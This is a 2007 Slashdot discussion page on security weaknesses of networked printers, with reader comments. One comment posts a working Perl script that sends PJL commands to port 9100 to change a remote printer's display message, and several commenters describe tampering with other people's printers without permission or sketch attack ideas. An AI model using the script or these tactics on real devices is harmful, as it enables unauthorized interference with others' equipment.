Beta
×

Welcome to the Slashdot Beta site -- learn more here. Use the link in the footer or click here to return to the Classic version of Slashdot.

Thank you!

Before you choose to head back to the Classic look of the site, we'd appreciate it if you share your thoughts on the Beta; your feedback is what drives our ongoing development.

Beta is different and we value you taking the time to try it out. Please take a look at the changes we've made in Beta and  learn more about it. Thanks for reading, and for making the site better!

Printers Vulnerable To Security Threats

kdawson posted more than 7 years ago | from the infected-my-what? dept.

Printer 173

jcatcw writes "Networked printers are more vulnerable to attack than many organizations realize. Symantec has logged vulnerabilities in five brands of network printers. Printers outside firewalls, for ease of remote printing, may also be open to easy remote code execution. They can be possible launching pads for attacks on the rest of the network. Disabling services that aren't needed and keeping up with patches are first steps to securing them." From the article: "Security experts say that printers are loaded with more complex applications than ever, running every vulnerable service imaginable, with little or no risk management or oversight.... [N]etworked printers need to be treated like servers or workstations for security purposes — not like dumb peripherals."

cancel ×

173 comments

Sorry! There are no comments related to the filter you selected.

Unless... (0)

Anonymous Coward | more than 7 years ago | (#17664720)

they run linux!

Of course! This is slashdot!

Re:Unless... (4, Interesting)

Jeremiah Cornelius (137) | more than 7 years ago | (#17665014)

We used these REGULARLY to exploit banks, in our testing.

The high-end HPs had both harddisk, and a JVM with listening socket on port 80. WHeee!

Re:Unless... (2, Insightful)

AndroidCat (229562) | more than 7 years ago | (#17665534)

And if you had some search engine toolbar installed, and printer was visible to the outside, its config page was probably snitched to the rest of the world.

Re:Unless... (4, Interesting)

FooAtWFU (699187) | more than 7 years ago | (#17666680)

My school, before the Great Firewalling of its network a few years ago, had its printers open to the whole Internet. Apparently someone hacked into one and used it as an FTP server for warez and porn. And it still worked as a printer. :)

Of course, this also means that I can't stick up a website for the world from my laptop anymore, either. =/ Ah well.

Try it out (5, Interesting)

delirium of disorder (701392) | more than 7 years ago | (#17664730)

Over the past several years, if you did a random port scan of the Internet (nmap -iR) the majority of open telnet (tcp port 23) servers were print servers that let you telnet in and change all sorts of settings.

Re:Try it out (4, Insightful)

Anonymous Monkey (795756) | more than 7 years ago | (#17664856)

What most people don't get is that that cute, slim-line print kit that they slid in the back of there copy machine is, in fact, made out of lap top parts and running DOS. Any multifunction print system is a computer with a printer & scanner attached, and should be treated thusly.

Re:Try it out (3, Interesting)

advocate_one (662832) | more than 7 years ago | (#17665152)

More likely a stripped down Linux... I assisted a service agent a couple of years ago and the fancy photocopier, scanner, faxer, emailer (it could scan and send the scans as emails... very useful) beast showed a Linux boot up sequence while booting into safe mode (he knew the secret jumper to set for this mode)... Also, my HP PSC1350 is running Linux, I know this because when I was installing Debian on my computer a few months ago, I had the printer connected and powered up and the Debian installer wanted to know if I wanted to install debian onto the ext2 partition it had found on the printer (connected via USB). I was rather surprised and thankfully I hadn't blindly accepted it.

Well, at least RMS is happy! (2, Funny)

iamacat (583406) | more than 7 years ago | (#17665780)

The whole reason he went into open source movement is because some printer was running proprietary software that he couldn't fix. At least now anyone can download source code from HP website and modify the way your printer works in any way they want.

Re:Try it out (1)

Anonymous Monkey (795756) | more than 7 years ago | (#17665938)

I have not played with a print controller in a while. The last time I was working with one was about two years ago, back then a brand new Konica ran MS-DOS.

Knowing that they are now Linux is a good bit of information.

Re:Try it out (0)

Anonymous Coward | more than 7 years ago | (#17666052)

Probably it wanted to format the memory card in the slot - not the printer's ROM. The memory card slots on those all-in-ones show up as standard mass storage devices through USB.

I can assure you that the desktop printers don't run linux :)

(I should know, I work in that division at HP...)

Re:Try it out (1)

advocate_one (662832) | more than 7 years ago | (#17666138)

no, there was no card in the slot, and it showed up as a 2 gig ext2 partition.

Re:Try it out (0)

Anonymous Coward | more than 7 years ago | (#17666254)

There are only a couple of units that ship with internal storage, and they're all small format (4x6 or 5x7). We'd be crazy to ship with 2GB of rom ($$$$$), exposed to the user, and formatted ext2. We don't even support that file system internally, for memory cards or any other purpose.

(I'm speaking only about desktop inkjets, mind you)

Re:Try it out (0)

Anonymous Coward | more than 7 years ago | (#17666224)

So you are "really getting a kick out of most of these replies"?

Re:Try it out (1)

Merkwurdigeliebe (1046824) | more than 7 years ago | (#17664928)

The sad thing is that many haven't got an admin password configured. And then thse things have u-webservers built-in. Dunno if anyone's made a useful hack of the web-end on these printers but it's possible.

Re:Try it out (2, Interesting)

Mister Whirly (964219) | more than 7 years ago | (#17665784)

If I find an open printer with out an admin password set, I generally will go in and keep changing the language to Portuguese or German on the control panel. It is mostly harmless, and points out the fact that someone can go in and easily change their settings. Some control panels even let you display a custom message. On those I have it read "CHANGE YOUR ADMIN PASSWORD NOW!" or "I AM NOT SECURE!"

Re:Try it out (1)

redsoxunixgeek (893384) | more than 7 years ago | (#17665040)

This is true I used to work for company X doing printer security testing some of the stuff you coujld do would freak you out - like uploading a script that allows a virus to be pushed out from a hard drive on an MFP Device using the onboard webserver. and stuff. It is kind of interesting but you could crash a network doing a TCP Flood as well - Good for Hackers, Bad for IT Departments.

Re:Try it out (1)

nine-times (778537) | more than 7 years ago | (#17665252)

I really don't get this-- why? Why would you put your printer outside your firewall? So you can print from the internet? What's the point?

Re:Try it out (3, Insightful)

soft_guy (534437) | more than 7 years ago | (#17665918)

I really don't get this-- why? Why would you put your printer outside your firewall? So you can print from the internet? What's the point?

The point is that these printers aren't being configured this way on purpose - people plug them and and dick with them randomly until they get a document to physically come out of the printer. Then they walk away from it and never think about it again until it runs out of toner.

Re:Try it out (1)

bladesjester (774793) | more than 7 years ago | (#17666152)

Some companies (especially smaller ones) do this because they want one of their workers to be able to print things on the office printer from their home office or some other place. They don't want to drop the money on getting a vpn set up, so they just put the printer out there and trust that nobody else can print to it (or don't know that someone else can).

I know it sounds strange to us, but it does happen.

Re:Try it out (1)

Anonymous Cowpat (788193) | more than 7 years ago | (#17666874)

I have a fairly modest (domestic) wired router with 8 ports (which cost £150 about 5 years ago). It has VPN. Why would any business have equipment which DIDN'T do VPN today?

Is it worth it? (1)

yog (19073) | more than 7 years ago | (#17666204)

Why make printers so "smart" to begin with? Used to be, a man was a man and a printer was a printer. It did what its master told it. The things had just enough internal logic to interpret the voltage differences on the RS232 pins, and maybe a few K of RAM (hah!) to buffer the jobs.

Now they have minds of their own. *Grumble* visions of departmental HP printers that never seemed to be configured properly, always displaying bizarre diagnostic messages
Even a $150 Brother all-in-one machine at the office is screwed up, won't print and says "end of toner life" though a reboot and shake the cartridge convinces it to print for a few pages.

Re:Is it worth it? (1)

digitalgoddess (1051762) | more than 7 years ago | (#17666518)

Less printing, we need to do more e-mail and electronic transfer/storage of documents. Ebooks!

*print incoming* (5, Funny)

BMonger (68213) | more than 7 years ago | (#17664752)

Dwight:

At 8 AM today, someone poisons the coffee. Do NOT drink the coffee. More instructions will follow.

Cordially, Future Dwight.

Identifying viruses (2, Informative)

Calinous (985536) | more than 7 years ago | (#17664756)

One of my colleague told me about a printer that started printing page after page of funny characters. It seems there was a virus in the network, trying to write himself on all shares - of which the printer had one.
      How much is able one of those printers to do? Printers dedicated to big offices have a pretty powerful processor, lots of RAM, hard drive. Taking control of such a printer could be just as useful for a black-hat cracker as taking control of a computer there, with the bonus that printers aren't usual suspects for infections

Re:Identifying viruses (2, Interesting)

chunews (924590) | more than 7 years ago | (#17664846)

In my experience, that virus - printing page after page of funny characters - is a human one, from someone trying to print a PCL formatted file to a PostScript printer or vice versa.

Re:Identifying viruses (1)

Calinous (985536) | more than 7 years ago | (#17664900)

It was a printer in a Windows network - and the network was inside a trash truck, street cleaning company. And when the computers with the virus were taken off network, the printing stopped

Re:Identifying viruses (2, Informative)

ajs318 (655362) | more than 7 years ago | (#17665578)

Or from switching on the printer after the instruction to enter graphics mode has been sent ..... resulting in the bitmaps which would make up the graphics being treated as ASCII codes, and printed in the printer's native font.

But no; I have seen a printer chuck out pages of junk, starting with "This program requires Microsoft Windows" or something, and it was due to an infected Windows machine trying to copy the virus to every SMB share it could see. Including the printer (which was on a SAMBA share). This was in the Windows '98 days, so the problem most probably doesn't occur nowadays. (We actually ditched all our Windows '98 machines in favour of what was then called Mandrake shortly afterward.)

What are they going to do... (3, Funny)

Macthorpe (960048) | more than 7 years ago | (#17664758)

...print out pictures of Viagra?

Re:What are they going to do... (2, Interesting)

Calinous (985536) | more than 7 years ago | (#17664802)

Taking a snapshot of everything that is printed, and mail it to an interesting party?
Altering what is printed? Change amounts on printed spreadsheets, change destination for item transfers, and other "creative uses"

Re:What are they going to do... (1)

geekoid (135745) | more than 7 years ago | (#17665228)

Ok, this is scary.

One of the first attacks done by security consultants is the printer. From there you can get into the network.

The fact that people here don't seem to relize this is just disconscerting.

Re:What are they going to do... (1)

Macthorpe (960048) | more than 7 years ago | (#17665834)

Or maybe I did realise it, and accidentally told a joke instead of making a serious comment (ohnoes).

I would say that it won't happen again, but I'm sure it will.

Re:What are they going to do... (1)

PPH (736903) | more than 7 years ago | (#17667026)


Taking a snapshot of everything that is printed, and mail it to an interesting party?

Yes. Well, not a snapshot. Just a copy of everything in their internal queue or print buffer.

Re:What are they going to do... (1)

Idbar (1034346) | more than 7 years ago | (#17664824)

or perhaps just AOL fliers.

Oh wait, they don't need that. They even send CDs home!

Well, if they can jam the printers and print stock values... that might be as well annoying.

Double duh (2, Informative)

Anonymous Coward | more than 7 years ago | (#17664784)

Printers have been network servers for a long time now. I have a 1995 vintage networked laser from Digital Equipment Corporation (rest in pieces) and its manual tells the exact procedure to get to the command line, by using a default password and telnt. Yes, this printer has a unix-like command line interface for configuring its print server functions, and anyone who knows the IP address and the password can get in. Needless to say I've been careful to keep the printer behind my firewall box.

Happened before (2, Interesting)

CapitalT (987101) | more than 7 years ago | (#17664786)

Anyone remember the story about the guy who wrote a "visual basic" virus to send the O RLY owl to all printers in the company?

Maybe we'll see a lot of these coming, it'll be fun *hee hee hee* {devilish laugh}. I don't have a printer }:-]

Jamming (5, Funny)

vjmurphy (190266) | more than 7 years ago | (#17664790)

Even worse, such attacks may jam the printers, making it impossible to print out important Dilbert cartoons.

Re:Jamming (0)

Anonymous Coward | more than 7 years ago | (#17665906)

Advice to job seekers on the interview visit: If there are too many Dilbert cartoons, walk away. If there are none, RUN!

Oh really? (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#17664798)

Oh really? Why this is news only NOW beats me. There's many more issues which are not talked about.

And what about some Xerox document center with a big-ass hard disk and tendency to break down...? Who will copy your documents while the machine is being serviced?

And what about some new computers where the hard disk breaks down after some months and you need to send the whole unit to be serviced by whoever you have the contract with? Who will own your data then?

And what about the company to whom you have outsourced your IT support?

And what about those outsourced subcontractor workers in India/East Europe/USA/Europe who are paid peanuts and want to make some more money or land a better job?

And what about the office on the other building, adjacent to your meeting room windows?

Think about them...

This is news? (5, Funny)

NoseyNick (19946) | more than 7 years ago | (#17664800)

Was years ago I hacked my employer's printer to say: "Insert Coin" instead of "Ready" and "Feed Me" instead of "Paper tray empty" ... and I know I could have done a lot worse.

Re:This is news? (2, Interesting)

Anonymous Coward | more than 7 years ago | (#17665086)

It seems like an innocent trick, but I once cost a company thousands. They had one printer that was cleared by the NSA for printing classified documents -- it didn't store the things it printed in RAM, or it had some approved method of obfuscating its RAM, or some shit.

I started dicking around with the PCL "ready" message, and they realized that it COULD store data -- in the "ready" message.

New printer, ahoy!

Re:This is news? (1)

jdew (644405) | more than 7 years ago | (#17665522)

HP Printer Hack
      12/8/97 sili@l0pht.com

I've still go that code :)

My LJ5 lives with 'I CRAVE BLOOD' on the lcd.

Re:This is news? (0)

Anonymous Coward | more than 7 years ago | (#17665414)

See, RIGHT THERE - THAT's the problem with Slashdot. It gives good employees BAD ideas.

"feed me" you say? Niiiiiice :)

Re:This is news? (1)

UnknowingFool (672806) | more than 7 years ago | (#17666240)

Instead of "Job Completed" could have set it a random message like "Wouldn't you like to be a Pepper too?"

Re:This is news? (1)

greed (112493) | more than 7 years ago | (#17666554)

Hacking?

The HP Admin utility for Mac OS System 7 that came with my LaserJet 4M had a panel for changing all the display messages. Sadly, the changes didn't survive a power-cycle on the printer, so "FEED ME" and "INSERT COIN" didn't last.

It could also 'speak' the LaserWriter status from any attached HP printer through the Mac's speech synth software. Cute... for about 10 seconds. "Status... prawcessing jaaawb. Status... printing. Status... prawcessing jaaawb... Status... printing."

Yeah - watch out (3, Funny)

TheWoozle (984500) | more than 7 years ago | (#17664806)

You don't want to become a victim of printer hacking. A malicious printer hacker could print out sheet music of copyrighted songs, stills from copyrighted movies, or child pornograhpy - leaving you a target of litigaton from the *AA or worse. Not to mention all the juvenile pranks like printing all your valuable company memos in l33t speak.

Protect your printers today!

I wonder when Symantec will release their first security software suite for printers...

Re:Yeah - watch out (0)

bcmm (768152) | more than 7 years ago | (#17664944)

They were talking more about reprogramming the printer to do scans from the inside than jMCSE ust sending malicious print jobs, I think.

But a 1337 filter for legitimate printing jobs would be brilliant. Imagine some poor technician trying to diagnose that...

Symantec anti-virus for printers. (2, Funny)

khasim (1285) | more than 7 years ago | (#17665084)

Given my past experience with the high quality of Symantec products we'll be switching to clay tablets and cuneiform.

In the long run, it will be easier and more cost effective.

Re:Symantec anti-virus for printers. (1)

krakelohm (830589) | more than 7 years ago | (#17665172)

I am chiseling out a response in granite, will send to you shortly.

...Anyone got any stamps?

Re:Yeah - watch out (1)

iminplaya (723125) | more than 7 years ago | (#17665688)

I wonder when Symantec will release their first security software suite for printers...

Since I spend half my time removing Symantec products from peoples' computers, this would be great for business.

Campus Printers (4, Interesting)

cpearson (809811) | more than 7 years ago | (#17664868)

On many if not most college campuses the printers are administered and accounted for my a system tied to a student id. Each student can get so many free prints per semester and can pay per print after exceeding that. Malicious code executing on a print server could sniff all the student accounts accessing the printer.

http://www.vistahelpforum.com/ [vistahelpforum.com]

Re:Campus Printers (1)

pla (258480) | more than 7 years ago | (#17665322)

On many if not most college campuses the printers are administered and accounted for my a system tied to a student id.

Yeah, I've seen that done before - It entirely depends on students printing via locked-down (usually Windows) print servers.

Just note the printer model, download the driver, and install the printer directly on your laptop. Bam, free and unlimited printing.

Re:Campus Printers (2, Informative)

drinkypoo (153816) | more than 7 years ago | (#17665726)

Yeah, I've seen that done before - It entirely depends on students printing via locked-down (usually Windows) print servers. Just note the printer model, download the driver, and install the printer directly on your laptop. Bam, free and unlimited printing.

The people at some schools are not idiots and can prevent you from doing this. Some printers actually have access controls, although people seldom bother to use them. Set an admin password, and disallow network printing from any but the print server addresses. Also if the printer itself is not on the same network as the clients, but instead connected only to the print server(s), then you're not going to get far with your little scheme.

Re:Campus Printers (1)

jimicus (737525) | more than 7 years ago | (#17666292)

We had a similar thing at Uni. The printers were free but were nailed to double-sided, economy mode.

Fortunately, the admins were nice enough to leave it setup so that it respected the lp -o raw command. Produce a postscript file of your printout and send it straight there, comes out exactly as you intended.

Re:Campus Printers (1)

rjune (123157) | more than 7 years ago | (#17665852)

Here is an extract from the ITS site at the university where I work:

By downloading and installing this software, you can print from your personal computer to any campus XXXXX printer. Click here for a list of campus XXXXX printers.

Printing is available on-campus, including wireless, and off-campus via XXXXX VPN (Virtual Private Network).

The account is tied to your student ID. Personal computers can be connected either via wired or wireless connections all over campus.

I'm sure that this is not a unique situation.

Re:Campus Printers (1)

profplump (309017) | more than 7 years ago | (#17666018)

First, an almost trivial change supported by many if not most printers is to allow print jobs only from a certain host or set of hosts. HP's JetDirect cards can even read that list of hosts from a DHCP parameter, so you don't have to update all your printers if the queue changes.

Since this is only an IP-based security solution it can be overcome, but it's not as trivial as plugging your computer into the network and installing the print drivers, at least not if the network is reasonably secured in the first place.

If you've got your printers on a isolated Ethernet segment, and you should if you're trying to control access to them, traffic sent from a spoofed print-server address on the workstation network segment should never make it to the printer segment. Unless you've got unused, active ports on the printer segment, an attacker would likely have to physically disconnect something on the printer segment and attach a hub to send packets with an appropriate fake IP address. Again it could be done, but it's not trivial.

That's not to say anyone actually sets up their printers or networks this way, but it is a reasonably secure way to enforce use of the print queue.

This is what happened to Iraq. (3, Interesting)

darkmeridian (119044) | more than 7 years ago | (#17664884)

Laugh if you want, but this was what happened to Iraq on the eve of the Gulf War. A modified printer was put onto their defense computer network by an Allied operative. Right when the air war started, the bug fired up and brought down the network. Just because a threat sounds outlandish does not mean it isn't a real threat.

(The story was recounted in The Generals' War.)

Re:This is what happened to Iraq. (2, Informative)

Anonymous Coward | more than 7 years ago | (#17665174)

Just because you read it soemwhere doesn't mean it's true [theregister.co.uk] Try googling "gulf war printer virus"

Mod parent down, mod first child up! (0)

Anonymous Coward | more than 7 years ago | (#17665968)

Mod parent down, mod first child up.

Printers... (0)

Anonymous Coward | more than 7 years ago | (#17664892)

When I was at University many years ago we used to take advantage of the fact the Windows 95/98 users often didn't restrict access to printers when they connected their machines to the Windows network. We used to add their local printers as network printers on some anoynmous workstation and out print pornographic material on the victim's printer in his apartment at the student home. I know it wasn't exploiting a vulnerability rather than an oversight by the owner of the remote machine, but the results when the victim's girlfriend came over for a visit and found the pictures lying in the printer tray were often amusing. Another gag exploited the fact that Windows 95/98 didn't give you the option to restrict the size of an SMB shared folder and even if it did many people didn't take advantage of it. So in the days of sub gigabyte sized hard drives a mischievously minded person could fill up a Windows workstation's hard drive with crap data by piling it into the shared folder.

Using printers to deal with rowdy girls (5, Funny)

GillBates0 (664202) | more than 7 years ago | (#17664904)

Not exactly the same scenario, but I think this comment [slashdot.org] by stuffman64 [slashdot.org] deserves an honorary mention here:

Last year in my apartment, I had a very loud, rowdy group of girls living above me. Basically, they would get all drunk and mean, and any attempt to ask them to politely stop stomping on the floor or whatever they do at 3AM was met with flase promises (5 minutes later they'd be at it again). Even my mack-daddy roommate couldn't seduce them in hopes of somehow convicing them to stop being so damn loud. This kid could pick up any girl he wanted, but we surmised from all the romping and giggling that perhaps they were more interested in eachother when they got so drunk (backed up by the fact that they always came to the door in robes and/or towels).

We tried to figure out a good way to get back at them. We could report them to the main office, but it's kinda a douchebag thing to do as in enails a $100 per person, not to mention that the apartment complex's owners were also douchebags and didn't deserve any more money from anyone. I'd known for a while that they had an unprotected wireless network, and all of their computers had file and print sharing enabled (not to mention that one of them appropriately named their computer "BITCHFACE"). I "stumbled upon" an ebook copy of War and Peace and decided to start printing it on all of their printers one day when I assumed they'd be at class. One of the girls (I assume the one who drives a Mercedes she must have got for graduation) had an HP Laserjet 5 (how the hell she had room for it in the apartment is beyond me), so there is a good chance I got off at least a few hundred pages before it ran out of paper. I'd assume they didn't know how or why it happened, but afterwards, any time they would be loud I'd start printing a bunch of pages of non-acronymized "STFU" pages. They eventually came down on time and told me that if we didn't stop printing, they'd tell the office. Once I reminded them that we could go down to the office to report noise violations @ $100 per person per violation (not to mention possible eviction after the 3rd violation) any time we heard any noise from them, they quickly realized we had the upper hand. After that, we didn't have any more problems with them, and actually started getting along with eachother.

Re:Using printers to deal with rowdy girls (-1, Troll)

j79zlr (930600) | more than 7 years ago | (#17665168)

I am so glad I am not that fucking lame.

Re:Using printers to deal with rowdy girls (0)

Anonymous Coward | more than 7 years ago | (#17666364)

Think again.

Re:Using printers to deal with rowdy girls (2, Funny)

Anonymous Coward | more than 7 years ago | (#17665380)

If there was a Penthouse for nerds, this could be the start of a great story.

Re:Using printers to deal with rowdy girls (1)

AndroidCat (229562) | more than 7 years ago | (#17666002)

"I usually don't believe the letters in Pentcube, but one day..."

Re:Using printers to deal with rowdy girls (1)

NosTROLLdamus (979044) | more than 7 years ago | (#17665486)

That story would've been so much better if it ended in sex.

Keep in mind (0)

overshoot (39700) | more than 7 years ago | (#17664936)

that a lot of network printers are actually Microsoft Windows based. As in, full-up MSWindows, media player etc. included.

The big difference is that they're not managed the same by the IT department, which means that they don't get updates, don't have antivirus, etc.

Think back to all of the remote exploits that have come out for MSWindows in the last several years, then take another look at your printers.

Isn't anything on the network a vulnerability? (3, Insightful)

192939495969798999 (58312) | more than 7 years ago | (#17664952)

I figure it's safer to assume that anything connected to the network could be an attack point. If you have a network toy like some light-up furby that connects to the network and changes color based on packet throughput, that thing probably has no security whatsoever on it (even assuming it has embedded linux or something).

Is this the cure? (1, Troll)

inode_buddha (576844) | more than 7 years ago | (#17664958)

Is this the cure for Freudian "printer envy"? It must be terrible when your printer feels vulnerable...

How FUDtastic!!! (2, Interesting)

Anonymous Coward | more than 7 years ago | (#17664980)

Symantec is really grasping at straws here. In the age of internet security, why anyone would put a printer outside the firewall is too far beyond me to comprehend. Any firewall admin should be able to put rules in place for remote printing. And for that matter, why does any one need to remotely print? Anybody heard of email? Ol' deskjet at home too slow? Users in the office too lazy? Too many pebcak errors? Remote printing may be the most worthless of the worthless network setups. Also, why are people not using external secure computing devices. This stuff is not that expensive for the return it gives.
Symantec is quaking in its boots and instead of shouting fire in a theater they should be looking at what they have and capitalizing on it. Why else would they buy Veritas? I'm sure it wasn't because it they wanted to add AV to it.

Re:How FUDtastic!!! (1)

Coeurderoy (717228) | more than 7 years ago | (#17666590)

Actually it is not necessary to have printers accessible from the outside, a clever hacker could craft a postcript page (this of course implies a postscript program) that
programs a printer to "do something nasty".

And the send the page as a "postcard", with "printit instruction" (for instance the visible part could be instructions on how to do an origami marylin monroe, or a cute valentin themed cupid/aeroplane) anything sufficiently "cute" would be printed by somebody eventually.

At wich time a whole class of printer is "owned".

Fortunatelly as long as enough "differently smart" people insist to use Windows on their PC, the script kiddies a kept occupied and happy.

So we can still use postscript for our favorite Linux connected network printers :-)

By the way I have this cute bunny to print .... ;-)

              Cheers

Toner and Ink Cartridge companies look to exploit. (2, Interesting)

Radon360 (951529) | more than 7 years ago | (#17664998)

Imagine those companies that sell expensive toner and ink cartridges pairing up with someone to write some malicious code to burn through your printing supplies faster.

It won't be long before you hear about something like the "Page_Blackout" or "Toner_Drain" worm.

Re:Toner and Ink Cartridge companies look to explo (1)

archen (447353) | more than 7 years ago | (#17665378)

Something similar has already happened I think although not intentionally. Some viruses in their attempt to spread themselves would send a bunch of junk out, and if a printer was on the other side then it would start spewing out garbage. I've also seen nmap scans lock up print servers / printers as well - sometimes with a line or two of stuff printed off.

I can see the 0-day exploit headline now (4, Funny)

antifoidulus (807088) | more than 7 years ago | (#17665026)

"Printers worldwide slammed with requests to print the goatse man"

Hey Smith.... are you printing something? (0)

Anonymous Coward | more than 7 years ago | (#17666170)

Hey Smith.... are you printing something?
No... why do you ask?
Well the printers been printing something for the last ten minutes... let me see...
AUUUUGH! MY EYES!
~lets see some anchor report on this with out bursting into fits of uncontrolable laughter...

Re:I can see the 0-day exploit headline now (1)

smoker2 (750216) | more than 7 years ago | (#17666294)

In other news, worldwide shortage of black ink, and barf bags.

Funny to realise that in 2006 (1)

denisbergeron (197036) | more than 7 years ago | (#17665124)

I find, use and patch somes problems with [ancester of] theses printers from 1998. I have to run some tests for the Y2K projet in that time, and we so much open telnet attack that can be made from printer, we design some specials firewall and network rules at that time.

If you are in the security industry (1)

geekoid (135745) | more than 7 years ago | (#17665188)

and this is news to you, please get out of the business.

Fax Machine? (1)

akeyes (720106) | more than 7 years ago | (#17665216)

Isn't this what is called a fax machine?

firewall (2, Insightful)

bfields (66644) | more than 7 years ago | (#17665218)

Printers outside firewalls, for ease of remote printing, may also be open to easy remote code execution.

Unlike, of course, printers behind firewalls, which are not at all open to remote code execution, since there's no chance that anything attached to the firewalled network will ever be hacked. Ah, the magic of the firewall.

Re:firewall (1, Insightful)

Anonymous Coward | more than 7 years ago | (#17666232)

Unless a PC gets infected and allows somebody to tunnel in and get access to everything inside the network.

Two areas of concern here (3, Informative)

RealProgrammer (723725) | more than 7 years ago | (#17665296)

In security we balance likelihood of attack, likely damage, and cost to mitigate the threat. The cost to mitigate includes labor, time, materials, and increased difficulty to use (or decreased availability of) the asset. For printers there are at least two such areas of concern (people model them as vectors or attack trees, variously).
  1. telnetting in
    1. For a base of operations
    2. As an aid in information gathering
  2. Denial of service
    1. Printing garbage as an annoyance
    2. Causing apparent hardware failure, distracting service personnel from real attacks
    3. Damaging the device with invalid NVRAM
  3. Loss of integrity: modify interpreter to change printing behavior in some mission-sensitive way.
For example, you could display "028*: Radon Discharge Hazard" or some other nonsense trouble symptoms at random intervals on the control panel. The techs in charge would then have to deal with that problem, while you attack their database server or other target. With a modified Postscript interpreter, you could insert random words or even carefully selected phrases in documents as they printed, using the same font that the document prints. How often do people proofread the text of a document they just proofread on screen? Only if they printed it to proofread it, and even then they might not notice. Also, printers in network environments often have file storage space, which makes them a target both to corrupt, if their storage is used in production. If the area is not used in production, it can be used by a rogue to hide things, since typically no one looks at that storage area if it's not in production.

Re:Two areas of concern here (1)

smoker2 (750216) | more than 7 years ago | (#17666350)

"Your mortgage application of one beeeeellion dollars has been approved."

Oblig. Office Space (0)

Anonymous Coward | more than 7 years ago | (#17665342)

``PC Load Letter? What the fuck does that mean?''

Hacking printers is easy (1)

thewils (463314) | more than 7 years ago | (#17665354)

People print sensitive documents to networked printers all the time. You just hang around the printer with your coffee waiting for 'your' job and either clear up the un-collected jobs that are always lying around, or grab stuff as it comes off the printer. The owner will always re-submit the job without a second thought.

Re:Hacking printers is easy (1)

AndroidCat (229562) | more than 7 years ago | (#17666338)

The big Xerox printer, copier, fax, etc, ones have a submission option for sensitive docs where it keeps it spooled until you go to the printer and give it the password.

Yeah, it's a security hole... (1)

Bright Apollo (988736) | more than 7 years ago | (#17665376)

... but it's the only place I can install a UT3 server at work and not have the sysadmins find it.

Happy fragging,

-BA

0-day exploit code! (0)

Anonymous Coward | more than 7 years ago | (#17665382)

#!/usr/bin/perl
#
# Printer Fun
#

use strict;
use IO::Socket;
use Getopt::Std;

my %opt;
my $data;
my $socket;

print "\nPrinter Fun :-)\n";

getopts("r:t:h", \%opt);
usage() if not %opt or $opt{h};

if ($opt{t} and $opt{r}) {
print "[+] Setting the printer ready message\n";

print " " . substr($opt{r}, 0,16) . "\n";
print " " . substr($opt{r}, 16,16) . "\n";

$data = "\033%-12345X" .
"\@PJL RDYMSG DISPLAY=\"" .
"$opt{r}\"\r\n\033%-12345X\r\n";

$socket = IO::Socket::INET->new(
PeerAddr=>$opt{t},
PeerPort=>9100,
Proto =>'tcp')
or die "[-] Couldn't connect to $opt{t}:9100 : $!\n\n";

print $socket $data;
close ($socket);

print "[+] DONE!\n\n";
} else {
print "\n[-] Specify -r and -t!\n\n";
}

sub usage {
print "usage: $0 [-r ] [-t ] [-h]\n";
print "-r : ready message display\n";
print "-t : target\n";
print "-h : help/usage\n";
print "example: $0 -r \"INSERT COIN\" -t 172.16.10.20\n\n";
exit;

Re:0-day exploit code! (1)

jdew (644405) | more than 7 years ago | (#17665728)

You've got a bug.

Terrorist can use this! (1)

chanrobi (944359) | more than 7 years ago | (#17665422)

Display "PC LOAD LETTER" on the printer. It'll be offline shortly thereafter.

Re:Terrorist can use this! (0)

Anonymous Coward | more than 7 years ago | (#17666142)

"PC LOAD LETTER"!!! What the F#$@ does that mean?!?!?

Thank god we don't (-1, Offtopic)

Anonymous Coward | more than 7 years ago | (#17665568)

use computers for voting. Now that would really be a mess.

The New Solution (0, Troll)

liak12345 (967676) | more than 7 years ago | (#17665678)

I heard Barbara Boxer supported a bill to install anti security-threat lasers on all printers within 20 years.

Hopefully... (1)

madhatter256 (443326) | more than 7 years ago | (#17665824)

Hopefully they'll come out with a patch that will stop printers from printing out pictures of Whoopi Goldberg naked. That happened in our office before. Poor Charles is blind.

im in ur printrz crashin ur networkz (1)

owlbino (1052982) | more than 7 years ago | (#17665866)

I call SKYNET on this one! I respond to maybe too many network, IT stories this way, but this has to set off warning lights.

Hacking Embedded Network Systems (3, Interesting)

nuckfuts (690967) | more than 7 years ago | (#17666148)

FX of Phenoelit gave an amazing talk on this at CanSecWest/core03 back in 2003 that outlined how to turn a JetDirect printer into a webserver, fileserver or even a port scanner! We all had a huge chuckle at the thought of someone tracking down a port scanner on the network only to find it was coming from an HP printer.

The entire presentation is still available online in both PDF [cansecwest.com] and PPT [cansecwest.com] format.

The tools used to hack the printers are available here [phenoelit.de] .

first impressions (1)

Skraeling2 (1018078) | more than 7 years ago | (#17666180)

i first read this as "Pirates Vulnerable to Security Threats"

Not just network vulnerability (1)

necro81 (917438) | more than 7 years ago | (#17666584)

The main network printer for my workgroup is the copier down the hall. Copiers can increasingly be used for espionage. This is actually nothing new, the CIA had Xerox outfit copiers in the Soviet Embassy with cameras [interesting-people.org] to photograph the documents being copied.

Nowadays, many copiers don't use traditional xerography [wikipedia.org] , but are just fast scanners with printers attached. The network copier/printer down the hall can be used as a document scanner, and even spits out PDFs with searchable text. I don't think it would be too difficult, if one knew the model they were working on, to write a script to send off a PDF of every single document that's scanned, printed, or copied using that machine. In a business with lots of sensitive work, that could be as bad as letting someone rifle through your files after hours.

HP Isn't the only brand (5, Informative)

howlinmonkey (548055) | more than 7 years ago | (#17667182)

I work in the networked printer/multifunction industry. While HP is popular on desktops, other brands are gaining, and rule in the 50ppm+ arena. These devices come from other vendors like Canon, Sharp, Kyocera and Xerox. These multifunction devices provide scan, fax and print services and run a variety of OS's from VxWorks to Solaris. Yes Johnny, that means Windows XP embedded as well. Although I have to say, I haven't seen a DOS based controller in about 6 years.

We routinely receive questions about security, and help patch and configure these boxes to meet network security requirements as closely as possible. Unfortunately, we have limited access to the core OS, so we go as far as we can and workaround the rest. Many vendors, especially those using Windows, provide controller patches with security fixes included. EFI [efi.com] even allows an admin to RDP in and use Windows Update to keep current

These devices aren't perfect, but they have come a long way. That being said, if you haven't heard about this in the past, you have no business being in charge of network security. Multifunction devices today are just as powerful as your desktops and servers, running the same software. Admin control is limited, and vulnerabilities are a reality - note the recent Xerox vulnerability [xerox.com]

I would say it is important to stay in contact with your local vendor/dealer to stay on top of these issues. We work with these products everyday, and receive regular notices about security issues and solutions, not to mention a wide variety of other product data. We are a resource, just like any other outside consultant, to help you get and stay secure.

Load More Comments
Slashdot Login

Need an Account?

Forgot your password?

Submission Text Formatting Tips

